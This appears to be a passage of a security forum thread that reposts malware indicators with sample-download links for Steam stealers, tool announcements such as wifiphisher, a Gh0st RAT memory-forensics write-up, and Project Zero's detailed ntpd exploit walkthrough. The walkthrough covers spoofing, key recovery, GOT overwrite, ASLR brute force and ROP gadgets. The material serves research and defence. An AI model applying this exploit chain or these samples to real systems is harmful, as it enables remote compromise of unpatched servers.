File name: HashChanger.exe File size: 544.0 KB ( 557056 bytes ) First seen: 2014-11-23 MD5: 732f303f34afa01e16fe3fc67a4e88ee SHA1: 7e26ddbf6e223ca17ffb9dd62831b5588ccd9b0d SHA256: c5e77e7b716c52bdd674e21e921d6b4a0bf09f5fd8d019c5e9e1835045124b65 ssdeep: 12288:58srPC/lUx539N3dPysQvxcRy1uvdy2jZZJAmnI/v:51b4qTzFDQvx65w2ymI VirusTotal: https://www.virustotal.com/en/file/c5e77e7b716c52bdd674e21e921d6b4a0bf09f5fd8d019c5e9e1835045124b65/analysis/ Malwr (Downloadable sample): https://malwr.com/analysis/MTllYWE2NzM4NWYwNGE1M2IyZDkxNjJmNjk2NjZmZmM/ File name: Knife Exploit.exe File size: 444.0 KB ( 454656 bytes ) First seen: 2014-11-29 MD5: 22d1eb7f6536b3873318ef143b11982b SHA1: 13514fcf49b5e40fbec16cff58ab328b70d1e9f0 SHA256: 87f9c7b0e3a00c3240be1a578c5340bd433182209df2ff8a9bae9f51f9c4d74a ssdeep: 6144:dnylhPXVLq/dEWPSWpNJ+ulGtfxqr6WB4F+tbhxl+WA1hzu8UYh:lyV0/dEWP3GxtJw4MR+Fr VirusTotal: https://www.virustotal.com/en/file/87f9c7b0e3a00c3240be1a578c5340bd433182209df2ff8a9bae9f51f9c4d74a/analysis/ Malwr (Downloadable sample): https://malwr.com/analysis/YWIyMGY0OWZhNTUyNDVjY2EyYjgxNTE1MmEzNDgzNDg/ File name: SSBuilder.exe File size: 619.0 KB ( 633856 bytes ) First seen: 2014-11-29 MD5: aad6c525784c7e9ede917c1d57fbf9fa SHA1: ede0c60b18ce52b6e50f7d18c3eccb27109cf79c SHA256: b2a1bfdc72a0b92b6ea510c98f2954ea94ecbab81eee13a7db379afb330c9d28 ssdeep: 6144:pXIa5sZuZTLq/dEWPSWpNJ+ulGtfxqr6WB4F+tbhxD4rrDBUYyMDEwk:pr5ssM/dEWP3GxtJw4MC VirusTotal: https://www.virustotal.com/en/file/b2a1bfdc72a0b92b6ea510c98f2954ea94ecbab81eee13a7db379afb330c9d28/analysis/ Malwr (Downloadable sample): https://malwr.com/analysis/NzgyYWNhN2I1ZjM4NGUwMDgzYTRkNjViNmYxYWMyOWI/ File name: SSE_Stealer_76561197960568995.exe File size: 253.0 KB ( 259072 bytes ) First seen: 2014-11-21 MD5: 05738a9c72ecea220dd668068b0d4a12 SHA1: 9d77843aaf9372cfb27978dd6c1034f77325edac SHA256: 3668b53bcb4f9031e585f58f01b638f2afe5e9e128a63994ee05e77a0f5e2ff4 ssdeep: 6144:tnFRpTJrYEYpsEzLq/dEWPSWpNJ+ulGtfxqr6WB4F+tbhx:tnFRpTJ1Y8/dEWP3GxtJw4M VirusTotal: https://www.virustotal.com/en/file/3668b53bcb4f9031e585f58f01b638f2afe5e9e128a63994ee05e77a0f5e2ff4/analysis/ Malwr (Downloadable sample): https://malwr.com/analysis/ZTBhNjBjZjc5NWUxNDdiYTg3YzE2Yjc5YjlhNWE2MTc/ File name: Steam Inventory Stealer - Builder.exe File size: 443.0 KB ( 453632 bytes ) First seen: 2014-11-21 MD5: 2f8b66e5ca6f4d569b05f7ebf9b41457 SHA1: b30351911491fcf8809c1e469c80f393c506ef1d SHA256: 4f6c96c12f72fbf6095fd8484f985d244d61b2153644430736e2d854790e644a ssdeep: 6144:v83x+y+eLq/dEWPSWpNJ+ulGtfxqr6WB4F+tbhx4MWwblGwsPtIGacnW:vx7/dEWP3GxtJw4McpgDsPrakW VirusTotal: https://www.virustotal.com/en/file/4f6c96c12f72fbf6095fd8484f985d244d61b2153644430736e2d854790e644a/analysis/ Malwr (Downloadable sample): https://malwr.com/analysis/MTQzMGIzYWNhYWYyNGNlNGI3NGM3ZTk0MTQ5ODkxOGY/ File name: SteamTradeHacker-v.3.6.exe File size: 257.0 KB ( 263168 bytes ) First seen: 2014-11-22 MD5: e834f7a3c508f24e29caf336e27d408d SHA1: 8874a35610d391a493f21618a01d79976f6a2ba5 SHA256: 737d7ac17382252ce0f7bf185e54675d42568057c23917d58189c1b8c0065478 ssdeep: 6144:GYLZOFDdMbLq/dEWPSWpNJ+ulGtfxqr6WB4F+tbhx:5ZCp/dEWP3GxtJw4M VirusTotal: https://www.virustotal.com/en/file/737d7ac17382252ce0f7bf185e54675d42568057c23917d58189c1b8c0065478/analysis/ Malwr (Downloadable sample): https://malwr.com/analysis/YjBmMGU5OWY2NTczNDZlNGIzYzE1MDYzYTAxY2ZjYjY/ File name: Stub.exe File size: 354.5 KB ( 363008 bytes ) First seen: 2014-11-29 MD5: dc88276de2ad28c7af2578e7f691b285 SHA1: 17bd2037abcc9a248cfb3e991be3e6e73bcfad18 SHA256: 4016e2a60be405e610245db9a87c807354c51db557a49103520f69b280f338dc ssdeep: 6144:DIqY6P0o2WU0dLq/dEWPSWpNJ+ulGtfxqr6WB4F+tbhxtq4i3:cqYjocZ/dEWP3GxtJw4Mxq1 VirusTotal: https://www.virustotal.com/en/file/4016e2a60be405e610245db9a87c807354c51db557a49103520f69b280f338dc/analysis/ Malwr (Downloadable sample): https://malwr.com/analysis/N2YxZDU3M2M1YzdkNDIzOGE2Mjk3ZjQ0MGM3YjYwYjY/ 7:49am | URL: 0x3a - Security Specialist and programmer by trade - Analysis of Steam stealers and the ‘Steam Stealer Extreme’ service Sursa: 0x3a - Security Specialist and programmer by trade - Analysis of Steam stealers and the ‘Steam Stealer Extreme’ service
  15. [h=1]Pin Tools[/h] I just decided to centralize my old and next Pin tools about program analysis in this repo. [h=2]Timeline[/h] [TABLE] [TR] [TH=colspan: 2]Timeline[/TH] [/TR] [TR] [TH]Name[/TH] [TH]date[/TH] [/TR] [TR] [TD]FormatStringDetection[/TD] [TD]Nov 11, 2014[/TD] [/TR] [TR] [TD]OverflowDetection[/TD] [TD]Oct 10, 2013[/TD] [/TR] [TR] [TD]ConcolicExecution[/TD] [TD]Aug 28, 2013[/TD] [/TR] [TR] [TD]InMemoryFuzzing[/TD] [TD]Aug 17, 2013[/TD] [/TR] [TR] [TD]LoopDetectionInstCounter[/TD] [TD]Aug 13, 2013[/TD] [/TR] [TR] [TD]ObsoleteStackFrameAccessDetection[/TD] [TD]Aug 08, 2013[/TD] [/TR] [TR] [TD]ClassicalUseAfterFreePatternMatching[/TD] [TD]Aug 08, 2013[/TD] [/TR] [TR] [TD]PointerWithoutCheckDetection[/TD] [TD]Aug 08, 2013[/TD] [/TR] [TR] [TD]TaintAnalysis[/TD] [TD]Aug 08, 2013[/TD] [/TR] [/TABLE] [h=2]Related blog post[/h] FormatStringDetection n/a OverflowDetection shell-storm | Stack and heap overflow detection at runtime via behavior analysis and PIN ConcolicExecution shell-storm | Binary analysis: Concolic execution with Pin and z3 InMemoryFuzzing shell-storm | In-Memory fuzzing with Pin LoopDetectionInstCounter n/a ObsoleteStackFrameAccessDetection shell-storm | Taint analysis and pattern matching with Pin ClassicalUseAfterFreePatternMatching shell-storm | Taint analysis and pattern matching with Pin PointerWithoutCheckDetection shell-storm | Taint analysis and pattern matching with Pin TaintAnalysis shell-storm | Taint analysis and pattern matching with Pin Sursa: https://github.com/JonathanSalwan/PinTools
  16. [h=1]wifiphisher[/h] [h=2]About[/h] Wifiphisher is a security tool that mounts fast automated phishing attacks against WPA networks in order to obtain the secret passphrase. It is a social engineering attack that unlike other methods it does not include any brute forcing. It is an easy way for obtaining WPA credentials. Wifiphisher works on Kali Linux and is licensed under the MIT license. From the victim's perspective, the attack makes use in three phases: Victim is being deauthenticated from her access point. Wifiphisher continuously jams all of the target access point's wifi devices within range by sending deauth packets to the client from the access point, to the access point from the client, and to the broadcast address as well. Victim joins a rogue access point. Wifiphisher sniffs the area and copies the target access point's settings. It then creates a rogue wireless access point that is modeled on the target. It also sets up a NAT/DHCP server and forwards the right ports. Consequently, because of the jamming, clients will start connecting to the rogue access point. After this phase, the victim is MiTMed. Victim is being served a realistic router config-looking page. wifiphisher employs a minimal web server that responds to HTTP & HTTPS requests. As soon as the victim requests a page from the Internet, wifiphisher will respond with a realistic fake page that asks for WPA password confirmation due to a router firmware upgrade. Performing MiTM attack Link: https://github.com/sophron/wifiphisher
  17. Understanding and Defeating Windows 8.1 Kernel Patch Protection: It’s all about gong fu! (part 2) Andrea Allievi Talos Security Research and Intelligence Group - Cisco Systems Inc. aallievi@cisco.com November 20th, 2014 - NoSuchCon Who am I • Security researcher, focused on Malware Research • Work for Cisco Systems in the TALOS Security Research and Intelligence Group • Microsoft OSs Internals enthusiast / Kernel system level developer • Previously worked for PrevX, Webroot and Saferbytes • Original designer of the first UEFI Bootkit in 2012, and other research projects/analysis Agenda 0. Some definitions 1. Introduction to Patchguard and Driver Signing Enforcement 2. Kernel Patch Protection Implementation 3. Attacking Patchguard 4. Demo time 5. Going ahead in Patchguard Exploitation Download: http://www.nosuchcon.org/talks/2014/D2_01_Andrea_Allievi_Win8.1_Patch_protections.pdf
  18. Hunting and Decrypting Communications of Gh0st RAT in Memory This blog post contains the details of detecting the encrypted Gh0st RAT communication, decrypting it and finding malicious Gh0st Rat artifacts (like process, network connections and DLL) in memory. I also present a Volatility (Advanced Memory Forensics Framework) plugin (ghostrat) which detects the encrypted Gh0st RAT communication, decrypts it and also automatically identifies the malicious Gh0st RAT process, its associated network connections and the loaded DLL's. This can help the digital forensic investigators and incident responders to quickly narrow down on the Gh0st RAT artifacts without having to spend time on the manual investigation. 1. Introduction Gh0st RAT is a Remote Access Trojan used in many cyber espionage/targeted attacks like "Gh0stnet" which was targeted against compromise of computer systems owned by the Private Office of the Dalai Lama, and several other Tibetan enterprises. Gh0st RAT was also used to attack large corporations in the oil and gas industry dubbed as "Operation Night Dragon" by McAfee. This malware has multiple capabilities which allows the attackers to take control of the infected machine some of them include screen control, keystroke logging, webcam eavesdropping, voice monitoring, and remote file downloads. More details of this malware can be found in this whitepaper titled "Know Your Digital Enemy" When a host is infected with Gh0st RAT, the malware collects the system information, encrypts the collected information and sends it to the C2 (command and control) server. In this blog I will show how this communication takes place and how this communication can be detected and decrypted in memory using a Volatility plugin. 2. Network Communications of Gh0stRat An example of Gh0st RAT traffic communication is shown below, this traffic contains 13 byte header, the first 5 bytes (called the Magic header) is a keyword in clear text like 'Gh0st' and the rest of the bytes are encoded using zlib compression algorithm (marked in green). Different variants use different magic headers and some variants use more than 5 byte magic headers Below screenshots show variants of Gh0st RAT using different magic headers 3. Why Volatility Plugin? There exists a Gh0st decode module in "chopshop" which can decrypt the Gh0st RAT communication from the packet capture(pcap), But while Investigating a real incident there exist some challenges like: a) Organization might not have a full packet capture solution It is not possible to trace back the malicious process even if the packet capture (pcap) is available c) It is not possible to trace back the malicious DLL using the packet capture Memory Forensics can help in overcoming these challenges so I decided to write a Volatility plugin which could identify from the memory image the encrypted Gh0st RAT communication, decrypt it and also identify the malicious process, network communications associated with that malicious process and the DLL's loaded by that malicious process. This can help the Investigators and the incident responders to not only decrypt the malicious communication but also to quickly identify the malicious Gh0st RAT artifacts in an automated way. 4. Detecting Gh0st RAT manually using memory image In this section I show the technique to detect the encrypted Gh0st RAT communication from the memory image manually using Volatility advanced memory forensics framework. 4.1. Detecting Gh0st RAT network communication Even though the Gh0st RAT variants change the magic keyword, it still follows a pattern in its network communication which can be detected using the regular expression shown below. /[a-zA-z0-9:]{5,16}..\x00\x00..\x00\x00\x78\x9c/ In order to detect this pattern in memory, Volatility’s yarascan plugin can be used against the memory image. The below screenshots shows the encrypted traffic detected in kernel memory. Once the encrypted traffic is detected, it can then be decrypted. 4.2. Detecting malicious Gh0st RAT process From an incident response perspective it is important to determine the malicious Gh0st RAT process. Once the network traffic is detected in memory, we can get the magic keyword from the network traffic (in this case Gh0st) and then look for the process that contains this magic keyword. The below screenshot shows the process (svchost.exe with pid 408) which contains the magic keyword (Gh0st). 5. Automating Gh0st RAT detection using Volatility plugin In this section, I present a Volatility plugin (ghostrat), which automates steps mentioned in the section 4 by: Looking for the Gh0st RAT network traffic pattern in kernel memory Extracting the magic keyword from detected pattern and decrypting the communication. Determining the malicious process by searching for the magic keyword in the user process memory Determining the network connections made by the malicious process Determine the DLL's loaded by the malicious process Below screenshot shows the ghostrat Volatility plugin. This plugin can be downloaded from GitHub or from Volatility Plugin Contest 2014. To use the plugin just copy it to the Volatility plugins directory. After copying the plugin, the Volatility's plugin system will automatically register the plugin as shown below 6. Detecting and decrypting multiple variants of Gh0stRat using Volatility plugin In order to demonstrate the capabilities of the plugin, I analyzed multiple variants of Gh0stRat samples in the sandbox and collected the pcap and the memory image. The below screenshot show the pcaps and the memory (.vmem files) images of three different Gh0stRat samples. The First two samples were run on Windows XP SP3 and third sample was run on Win7SP0x86 6.1. Investigating the first sample (Gh0st.vmem and Gh0st.pcap) The below screenshot shows the Gh0stRat communication. In this case the infected host 192.168.1.100 (which is the Windows XP machine where the sample was run) is sending the encrypted traffic to C2 (192.168.1.2 which is my Linux machine acting as C2) on port 2011, also in this case the magic keyword "Gh0st" was sent in the first 5 bytes After running the plugin against the memory image (Gh0st.vmem), it detected the encrypted traffic in the memory and decrypted it, it also detected malicious process as svchost.exe process (with pid 408). In the Decrypted traffic shown below, the system information is passed to the command and control server. The value shown in blue (05 00 00 00) which should be read as 00 00 00 05 (because of the little endian) format is the major version of the operating system which is 5. The value shown in green (01 00 00 00) should be read as 00 00 00 01 is the minor version of the Operating system which is 1. So looking at these two values we can tell which OS was infected. In this case it is 5.1 which is Windows XP The values shown in yellow (28 0a 00 00) should be read as 00 00 0a 28 is the build number of the operating system which in decimal is 2600. This is the build number of windows XP. From the decrypted communication it can be seen that the Service Pack (service pack 3) and the Hostname (in this case it is "myhostname") of the infected machine is also passed to the attacker The Volatility plugin was able to automatically detect svchost.exe (with pid 408) as the malicious process, The plugin also detected malicious network communication associated with svchost.exe (with pid 408). The below screenshot also shows the connection to the IP 192.168.1.2 on port 2011( this is the same traffic captured in the pcap). This can help the investigators to quickly determine the C2 ip involved in the compromise. svchost.exe is the legitimate OS process, and also the functionality of svchost.exe is to load DLL's running as service, so there is a possibility that svchost.exe loaded a malicious DLL. It's important from an incident response perspective to find the malicious DLL. Once the malicious process is identified, the plugin also lists all the DLL's loaded by the malicious process. This can help the investigators to quickly pin point on a malicious DLL. The below screenshot shows the suspicious file loaded by the svchost.exe (pid408). After dumping this suspicious file from memory and submitting to VirusTotal, Antivirus vendors detect this as (Magania/Farfli) which is same as Gh0strat. 6.2. Investigating the second sample (HEART.vmem and HEART.pcap) The below screenshot shows the Gh0stRat communication with 192.168.1.2 on port 2013, in this case the magic keyword "HEART" was sent in the first 5 bytes After running the plugin against the memory image (HEART.vmem), it detected the encrypted traffic in the memory and decrypted it, it also detected malicious process as Garss.exe process (with pid 124). Plugin also detected the malicious communication to the IP 192.168.1.2 on port 2013 (that we saw in the pcap) which is associated with process Garss.exe (with pid 124). It also detected all the DLL's loaded by the malicious process. From the below screenshot it can be seen that a malicious DLL is loaded by the process(Garss.exe) 6.3. Investigating the Third sample - Windows7 image (win7_cb1st.vmem and win7_cb1st.pcap) The below screenshot shows the Gh0stRat communication with 192.168.1.3 on port 8000, in this case the magic keyword "cb1st" was sent in the first 5 bytes After running the plugin against the Windows 7 memory image (win7_cb1st.vmem), it detected the encrypted traffic in the memory and decrypted it, it also detected malicious process as svchost.exe process (with pid 840). Based on the major, minor version and the build number ((highlighted in blue, green and yellow) from the decrypted traffic it can be determined that the infected OS is Windows 7 and the hostname of the infected machine is "win7-sandbox" Plugin also detected the malicious communication to the IP 192.168.1.3 on port 8000(that we saw in the pcap) which is associated with process svchost.exe (with pid 840). The plugin also detected all the DLL's loaded by the malicious process. From the below screenshot it can be seen that a malicious DLL is loaded by the process(svchost.exe) This blog post explained the details of Gh0stRat communication and showed the method to detect it manually using Volatility advanced memory forensics framework. I also presented a plugin that detects the malicious process, network communication, Loaded DLL's and decrypts the network communication of multiple variants of Gh0stRat in an automated way. This allows the incident responders/Investigators to quickly detect the malicious Gh0stRat artifacts, C2 ip and it also helps in determining the type of information that was exchanged between the infected host and the C2 server. Thanks to core developers of Volatility for their encouragement, for being an inspiration and for authoring one of the best books i have read last year and many years to come "The Art of Memory Forensics": Michael Ligh (@iMHLv2), Andrew Case (@attrc), Jamie Levy (@gleeda) and Aaron Walters(@4tphi). Special thanks to Michael Ligh for going through my content and suggesting the changes (inspite of his busy schedule) and also for suggesting me to submit the plugin to the Volatility Plugin Contest 2014 Posted Yesterday by Monnappa KA Sursa: Malware Forensics Research Blog: Hunting and Decrypting Communications of Gh0st RAT in Memory
  19. Hacker Releases New Tool to Brute-Force Attack iCloud Passwords Posted on January 3, 2015 by Waqas Reports emerged of a new tool claiming the ability to successfully carry out password dictionary attacks on any iCloud account without being detected by Apple’s security. It seems that the vulnerability has just been patched and anyone trying to use this tool is being locked out of repeated password attempts. Earlier in September, Apple had reported that it had already patched up one hole that allowed brute-force attacks like these. The tool’s source code, released on GitHub, showed nothing extremely advanced. It just attempts every possible word out of its give 500 word list and tries it out for the password of any iCloud account email. The tool, judging from its source code, does not show that it will succeed at cracking passwords. Passwords that are not from the 500-word dictionary present in this tool are safe but it still posed a risk as many people do use simple dictionary words as their iCloud passwords. While this tool was crude and unsuccessful, more weathered hackers could develop it and use a much larger word list to use than this one. Apple appears to have resolved the hack now which simply relied on pretending to be an iPhone device. What is surprising is that fact that Apple allows indefinite requests without turning towards password locking after a certain number of requests for instance. At the same time this was happening, the Photos app for iCloud has been pulled and it is not yet clear if there is a connection between both stories. Sursa: http://hackread.com/brute-force-attack-icloud-passwords/
  20. Finding and exploiting ntpd vulnerabilities Posted by Stephen Röttger, Time Lord [Foreword by Chris Evans: this post by Stephen represents the first Project Zero guest blog post. From time to time, we’ll be featuring guest blog posts for top-tier security research. In this instance, we’ve been impressed by the remotely exploitable nature of these vulnerabilities, as well as the clever chain of bugs and quirks that eventually leads to remote code execution. You’ve probably seen the recent ntpd vulnerability disclosures and this blog post tells the story from one of the researchers who discovered the issues. Over to Stephen…] A few months ago I decided to get started on fuzzing. I chose the reference implementation of the Network Time Protocol (NTP), ntpd, as my first target, since I have somebackground with NTP and the protocol seemed simple enough to be a good learning experience. Also, ntpd is available for many platforms and widely in use, including being part of the default OS X installation. While looking at the source to get a better understanding of the protocol I noticed that its processing is far more complex than I expected. Besides the time synchronization packets, ntpd supports symmetric and asymmetric (Autokey) authentication and so called private and control mode packets that let you query the daemon for stats or perform configuration changes (if I’m not mistaken, this is the protocol spoken by ntpdc and ntpq respectively). I quickly stumbled over a bug in the code processing Autokey protocol messages and decided to dig deeper and perform a manual code review of the other parts as well. This resulted in finding CVE-2014-9295 and writing my first ever OS X exploit for which I will present a write up today. tl;dr: a global buffer overflow can be triggered on common configurations by an attacker on the local network through an IPv6 packet with a spoofed ::1 source. If your ntpd is not patched yet, add nomodify or noquery to every restrict line in your config, even the ones for localhost. But enough of that, let's jump into the details. The Bug The most severe bug that turned out to be exploitable on OS X Mavericks is a buffer overflow in the code which handles control packets. Control mode responses are fragmented if they exceed the size of the buffer used to store them, as implemented in the following function: static void ctl_putdata( const char *dp, unsigned int dlen, int bin /* set to 1 when data is binary */ ) { //[...] /* * Save room for trailing junk */ if (dlen + overhead + datapt > dataend) { /* * Not enough room in this one, flush it out. */ ctl_flushpkt(CTL_MORE); } memmove((char *)datapt, dp, (unsigned)dlen); datapt += dlen; datalinelen += dlen; } As you can see, if the data to be written doesn't fit into the remaining buffer space <ctl_flushpkt> is called, which will send out the current packet and reset the datapt to point to the beginning of the buffer. However, memmove will be called in any case and if dlen is bigger than the total buffer size it will overflow the buffer. Note that the overflow happens in a global buffer and thus stack cookies won’t help in this case. So let's see if we can find a code path that will trigger this. In most invocations, the data to be written comes from a fixed size buffer that is smaller then the output buffer and thus won't overflow. The function <configure> which handles ntp.conf style remote configurations sent by a privileged client will send any error messages back to the client using <ctl_putdata>. By sending a configuration with enough errors, the error message string will exceed the buffer size. However, the fact that the written data is restricted to a fixed set of error messages makes exploitation difficult. A more powerful overwrite can be found in <read_variables>. The NTP daemon keeps a list of name=value variables that can be set through the configuration and read back with a control mode packet. If a variable bigger than the output buffer is read back, it will overflow and corrupt whatever is stored behind the buffer. Setting Variables So how can we set variables? As mentioned before, there is a control mode packet through which we can send configuration commands to ntpd and thereby set any variable we want. But this is obviously a privileged operation and protected by two mechanisms: Access to private and control mode queries can be restricted in ntp.conf based on the source IP. Default installations usually prohibit these queries for every source IP except for 127.0.0.1 and ::1. This is what e.g. Ubuntu, Debian and OS X do. The packet needs to be authenticated with a MAC for which the shared key has to be specified in ntp.conf, which again shouldn't be set on default installations. Bypassing the first one is actually not that hard if you’re on the same network. As we all know IP addresses can be spoofed. But can we spoof the address of localhost? It turns out OS X and the Linux Kernel behave similarly in this case. Any IP packet arriving on an external interface and with the source IP 127.0.0.1 will be dropped immediately. But if we use IPv6 instead we can actually spoof ::1 and send control mode packets to the daemon (some Linux distributions have firewall rules in place that protect against this, e.g. Red Hat). Thus, if we are on the same local network, we can send spoofed packets to the link-local address of the target and bypass the IP restrictions. But what about requirement number 2? This one sounds tough: how can you have a valid MAC if no key is specified? Quest for the Key Let’s back up and discuss a little bit of background first. Through ntp.conf you can specify multiple keys and assign key ids to them. These key ids can then be assigned to different roles, i.e., a requestkey can be used to authenticate private mode packets and a controlkey is used for control mode packets. We need a controlkey to send our configuration requests but a requestkey would actually suffice since a private mode packet exists that will set the controlkey id to a specified value. And that’s where another bug comes into play that was discovered by Neel Mehta. Let’s take a look what ntpd does if no requestkey was specified in the config: /* if doesn't exist, make up one at random */ if (authhavekey(req_keyid)) { //[...] } else { unsigned intrankey; rankey = ntp_random(); req_keytype = NID_md5; req_hashlen = 16; MD5auth_setkey(req_keyid, req_keytype, (u_char *)&rankey, sizeof(rankey)); authtrust(req_keyid, 1); } That’s right, if no key was specified, a random 31 bit key will be generated, which means we can brute force it by sending 2^31 packets to the vulnerable daemon with a 68 byte payload each. But wait, there’s more! The random key is created by a custom random number generator implementation that is seeded with a 32 bit value and we can get the output of this generator through standard time synchronization requests. Part of the receive timestamp that we get by querying the time from the daemon is a random value from this generator and each query allows us to recover around 12 bits of the output which we can use to brute force the seed offline. However, the feasibility of a naive brute force approach highly depends on the uptime of ntpd since the number of random values that have been created will increase the search space. To give an idea of the time complexity, my single core implementation takes a few hours on my laptop even if I limit the search space to the first 1024 random values, but you can throw more cores at the problem or precompute as much as possible and build a lookup table. At this point, we have an overflow in a global buffer that can be triggered remotely on standard configurations. Neat! The Overflow Now that we have the key, we can send configuration commands and write arbitrary variables. When reading them back from the daemon, you can optionally specify the variables that you’re interested in. ntpd will iterate through them, write them (separated by a comma) to the global buffer through the function <ctl_putdata> and finally flush them out with <ctl_flushpkt>. There are still some restrictions on this overflow that make exploitation notably harder. We can’t write 0x00, 0x22 (“) and 0xff. Some data will be appended after our overwrite. That is, “, “ between two variable writes and “\r\n” on the final flush. How to proceed from here depends on which OS/distribution/architecture you target since protection mechanisms and the memory layout of the global data structures will differ. A few examples: On x64, the inability to write null bytes prevents us from completely overwriting pointers since the most significant bytes are null bytes. This poses a problem since “\r\n” is appended to our data, which will limit the control over partial pointer overwrites. On x86 however, this shouldn’t be an issue. At least on Debian, some compile time protections are not enabled for ntpd. I.e. the executable is not position independent and the global offset table (GOT) is writable during runtime. On OS X Mavericks, the datapt variable which points to the current position in the buffer is located after the buffer itself while on Debian and Ubuntu the pointer is in front of the buffer and can’t be overwritten. I chose to try my luck on a 64 bit OS X Mavericks. Since I have no prior experience with OS X, please bear with me if I missed something obvious or use the wrong nomenclature . The environment looks like this: The binary, stack, heap and shared libraries are individually randomized with 16 bit entropy. The address of the shared libraries is randomized at boot time. On a crash, ntpd is restarted automatically with approximately 10 seconds delay. ntpd is compiled with stack cookies (which doesn’t matter in our case since we overflow a global buffer). The global offset table (GOT) is writable during runtime. For a reliable exploit we will have to bypass ASLR somehow, so let’s leak some pointers. This one is actually quite easy since the datapt variable, which as you might remember points to the current write location, is located after the buffer itself: We just have to overwrite the two least significant bytes of the datapt variable and as a consequence, ntpd will miscalculate the length and send you data after the buffer which leaks a pointer into the ntpd binary as well as a heap pointer. After that, the datapt variable is conveniently reset to point to the beginning of the buffer again. Note that usually “\r\n” would get appended to our data and corrupt the partial pointer overwrite. But since we overwrite the write pointer itself, the newline sequence will be written to the new destination instead. With the same trick, we can turn the bug into a slightly restricted write-what-where primitive: partially overwrite the datapt variable to point to where you want to write (minus a few bytes to make room for the separator) and then write arbitrary data with a second ntpd variable. Again, the fact that garbage is appended to our data is no issue for the first write since it will be written to the new location instead and won’t corrupt the pointer. Note that we can only write arbitrary data in front of the buffer since a higher address will trigger a flush and reset the datapt (after writing the separator, so this might still be used to corrupt a length field). Unfortunately, the appended bytes still pose a problem. If we try to do a partial pointer overwrite through this, the “\r\n” sequence will always corrupt the pointer before it is used. Well, almost always. The GOT, and this took me way too long to figure out, is actually writable and used twice before our overwrite gets corrupted by the addition of “\r\n”. Between writing a variable and flushing the packet, <strlen> and <free> are called. That means, if we partially overwrite the GOT entry of either of those functions, the pointer will be used before it gets corrupted and we control rip. Info leak, again Since we know the base address of the binary and can overwrite GOT entries we can just find a nice gadget in the binary and jump to it, right? Unfortunately, that doesn’t work. To see why, let’s take a look at a couple of example addresses from the binary and libsystem_c: 0x000000010641c000 /usr/sbin/ntpd 0x00007fff88791000 /usr/lib/system/libsystem_c.dylib The addresses of system libraries have two null bytes as their most significant bytes while the binary address starts with three null bytes. Thus if we overwrite the GOT entry of <strlen> with an address from the binary, there will still be 0x7f byte left from the library address (remember: we can’t write nul bytes). To obtain the address of a system library we could try to turn our overwrite into a better leak, e.g. by overwriting some length field. But there is a lazier approach due to a weakness of ASLR on OS X Mavericks. The most common libraries are loaded in the split library region (as “man vmmap” calls it) which is shared by all processes in the system. The load address of this region is randomized during boot. This means that the addresses stay the same if a program is restarted and that even libraries which are not used by the program are loaded in its address space and can be used for ROP gadgets. This and the fact that ntpd is restarted automatically when it crashes makes it possible to brute force the library addresses for <strlen> (libsystem_c) or <free> (libsystem_malloc) bytewise. If you reboot your system a few times, you can observe that the load address of the split library region is always of the form 0x00007fff8XXXX000, providing 16 bit of entropy or 17 bit in our case since the region can extend to 0x00007fff9XXXX000. Let’s use the libsystem_c address from the example before: 0x00007fff88791000. We know that <strlen> is located at offset 0x1720and thus 0x00007fff88792720is the address we’re trying to brute force. We start by brute forcing the upper 4 bits of the second least significant byte. We overwrite the GOT entry of <strlen> with 0x0720, resulting in the new entry 0x00007fff88790720. Since we didn’t hit the correct address ntpd will crash and won’t send us any replies anymore. In that case, we increment the address to 0x1720 and try it again. If ntpd does send us a reply, which will happen at 0x2720, we know that we found the correct byte and continue with the next one (0x012720). This way, we can recover the libsystem_c address in 304 tries (4 bit + 8 bit + 5 bit) in the worst case. OS X will restart ntpd approximately every 10 seconds but you will need to brute force the key anew for every try, so bring your supercomputer. Also, if you’re unlucky you will run into an endless loop and ntpd has to be killed manually. Arbitrary Code Execution If it wasn’t for the fact that ntpd runs in a sandbox we would be finished now. Just overwrite the GOT entry of <strlen> with the address of <system> and execute arbitrary commands since it will get called with a user controlled string. But all you get out of this is the following line in /var/log/system.log: sandboxd[405] ([41]): ntpd(41) deny process-exec /bin/sh Instead, we need to find a nice gadget to control the stack pointer and make it point to a ROP chain. The usual way to do this would be a stack pivot but the data we control on the stack is limited. On the stack, we control data in 3 locations which we can fill with arbitrary pointers, this time without any restrictions. Besides that, we completely control the contents of a global buffer at a known address in the binary and if we can get the stack pointer (rsp) to point to this buffer we can execute an arbitrary ROP chain. Since our exploit overwrites the GOT, we only control the instruction pointer once, i.e. we can’t chain multiple calls. Thus, our first gadget needs to increment the stack pointer by either 0x80, 0x90 or 0xb8 so that it will use one of our addresses on return and do something useful at the same time. Fortunately, I found the following gadget in libsystem_c.dylib: add rsp, 0x88 pop rbx pop r12 pop r13 pop r14 pop r15 pop rbp ret This gadget returns to our address at rsp+0xb8 and at the same time loads the value from rsp+0x90 into r12. Since we now control a register, we can chain gadgets that end in a call qword [reg+n] where reg points to the global buffer that we control. For example, the second gadget looks like this: mov rdi, r12 mov rsi, r14 mov rdx, r13 call qword [r12+0x10] With a few gadgets of this kind, we control rsi and can load it into rsp: push rsi pop rsp xor eax, eax pop rbp ret And with that, we’re done. This will crash on a ret instruction with rsp pointing to user-controlled and thus arbitrary code execution is straightforward. Since we control the stack, we can build a ROP chain that loads and executes shellcode and from there try to break outof the sandbox by attacking the kernel or IPC channels. But that is left as an exercise for the reader . Exploit Summary Send a bunch of regular time synchronization requests to leak random values. Brute force the seed and calculate the requestkey (which has the keyid 65535). Send a private mode packet signed with the requestkey and with a spoofed source IP of ::1 to the server to set the controlkey id to 65535. Send a configuration change to lift all restrictions for our IP address. Add our IP to get async notifications (we have to do this, since we overwrite a flag later that triggers if responses are sent directly or asynchronously). Trigger the overflow by setting a long variable and reading it back and leak the binary base address. Use the overflow again as a write-what-where primitive to brute force the address of <strlen> bytewise. Prepare the data on the stack and in the global buffer. Call the gadgets to control rsp and execute a ROP chain. Mitigation In case your ntpd is not patched yet, these bugs can be effectively protected against through changes in your ntp.conf. The vulnerable <ctl_putdata>function is used by the processing of control mode packets and this can be blocked completely by adding “noquery” to every restrict line in the configuration. As explained before, it is important to also add “noquery” to the restrict lines for localhost, since the IP based access restrictions can often be bypassed through spoofing. But note that this will prevent ntpq from working and you won’t be able to query for peer information and other stats anymore. For example, if your configurations includes multiple “restrict” lines: restrict default kod nomodify notrap nopeer noquery restrict -6 default kod nomodify notrap nopeer noquery restrict 127.0.0.1 restrict -6 ::1 make sure that “noquery” is included in all of those: restrict default kod nomodify notrap nopeer noquery restrict -6 default kod nomodify notrap nopeer noquery restrict 127.0.0.1 noquery restrict 